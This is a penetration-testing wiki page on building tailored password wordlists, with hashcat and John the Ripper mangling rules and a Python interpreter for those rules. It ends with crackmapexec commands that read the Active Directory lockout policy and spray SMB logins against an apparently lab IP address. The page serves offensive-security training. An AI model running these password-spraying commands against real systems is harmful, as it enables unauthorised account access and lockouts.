wiki.hackerlab.cz
Password Cracking

Infra password cracking - Build your own wordlist that fits


Last updated 1 year ago


Take a wordlist

For example, a statistically likely one:

wget https://raw.githubusercontent.com/insidetrust/statistically-likely-usernames/master/weak-corporate-passwords/english-basic.txt
# add the usernames you enumerated to the same list
cat users.txt >> english-basic.txt

Or build your own, based on user enumeration (SMB, RPC, web).

Building Your Own Password Wordlist

usernames, including admin accounts
seasons
password
<empty> (blank password)

Rules Mangling with

Enrich your wordlist with mangling rules: append characters, toggle case, reverse, duplicate, and so on.

hashcat

# --stdout prints the mangled candidates instead of cracking, so you can save them as a new wordlist
hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.list

John The Ripper

john hashes --wordlist=mywordlist --rules=MyRuleSet

where the rule sets are defined in /etc/john/john.conf:

# append four digits (the [0-9] classes are expanded by John's rule preprocessor)
[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"

# toggle the case of characters 0, 1 and 2 in every combination
[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2

# duplicate the word
[List.Rules:Double]
d
p5

# reflect: word followed by its reverse
[List.Rules:Reflect]
f

# reverse the word
[List.Rules:Reverse]
r
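What the john.conf rule sets above do to a base word, as an added example that is not John's own code: a small Python interpreter for the commands those sets use (`:` no-op, `r`, `d`, `f`, `TN`, and `AN"STR"` with John's `[..]` preprocessor classes; `p5` is left out). Running the sets over two constructed season words gives the candidate count a password policy has to stand up to; the four-digit suffix alone contributes 10,000 per word.

```python
import itertools
import re

CLASS_RE = re.compile(r"\[([^\]]+)\]")
# single-character commands from the page's rule sets: no-op, reverse, duplicate, reflect
SIMPLE = {":": lambda w: w, "r": lambda w: w[::-1], "d": lambda w: w * 2, "f": lambda w: w + w[::-1]}

def expand_class(spec):
    """Expand a [..] class body such as '0-9' or 'ab-d' into its characters."""
    return [c for lo, hi, one in re.findall(r"(.)-(.)|(.)", spec)
            for c in (one or map(chr, range(ord(lo), ord(hi) + 1)))]

def preprocess(rule):
    """John's rule preprocessor: one concrete rule per combination of [..] classes."""
    parts = CLASS_RE.split(rule)            # literal, class, literal, ..., literal
    literals, classes = parts[0::2], [expand_class(c) for c in parts[1::2]]
    for combo in itertools.product(*classes):
        yield "".join(lit + ch for lit, ch in zip(literals, combo)) + literals[-1]

def apply_rule(rule, word):
    """Apply one concrete rule; supports : r d f TN and AN"STR" (N = 0-9, A-Z or z)."""
    out, i = word, 0
    while i < len(rule):
        cmd = rule[i]
        if cmd in SIMPLE:
            out, i = SIMPLE[cmd](out), i + 1
        elif cmd == "T":                    # toggle case of the character at position N
            n = int(rule[i + 1], 36)
            if n < len(out):
                out = out[:n] + out[n].swapcase() + out[n + 1:]
            i += 2
        elif cmd == "A":                    # AN"STR": insert STR at position N (z = end)
            pos, quote = rule[i + 1], rule[i + 2]
            end = rule.index(quote, i + 3)
            n = len(out) if pos == "z" else int(pos, 36)
            out = out[:n] + rule[i + 3:end] + out[n:]
            i = end + 1
        else:
            raise ValueError(f"unsupported rule command {cmd!r}")
    return out

def mangle(words, rules):
    """Every candidate the rules derive from the wordlist, deduplicated, order kept."""
    cands = (apply_rule(c, w) for w in words for r in rules for c in preprocess(r))
    return list(dict.fromkeys(cands))

# Constructed input: the rule sets from the john.conf fragment above (p5 left out); ":" keeps the base word
PAGE_RULES = [":", 'Az"[0-9][0-9][0-9][0-9]"', "T0", "T1", "T2", "T0T1", "T1T2", "T0T2", "T0T1T2", "d", "f", "r"]
```

`mangle(["Summer", "Winter"], PAGE_RULES)` yields 20,022 candidates, 10,011 per word.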

Now that you have a wordlist that fits, prepare for the online password attack by checking the account policy first.

Account Policy

Determine the Active Directory account lockout policy of the target infrastructure before you start, or you will lock out accounts:

crackmapexec smb 10.129.228.111 --pass-pol

Start to crack with

Crackmapexec smb

# usernames as passwords (each account tried with its own username)
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt --continue-on-success

# with the custom password list built above
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lst

References:
rule_based_attack [hashcat wiki]
Comprehensive Guide to John the Ripper. Part 5: Rule-based attack (Ethical hacking and penetration testing)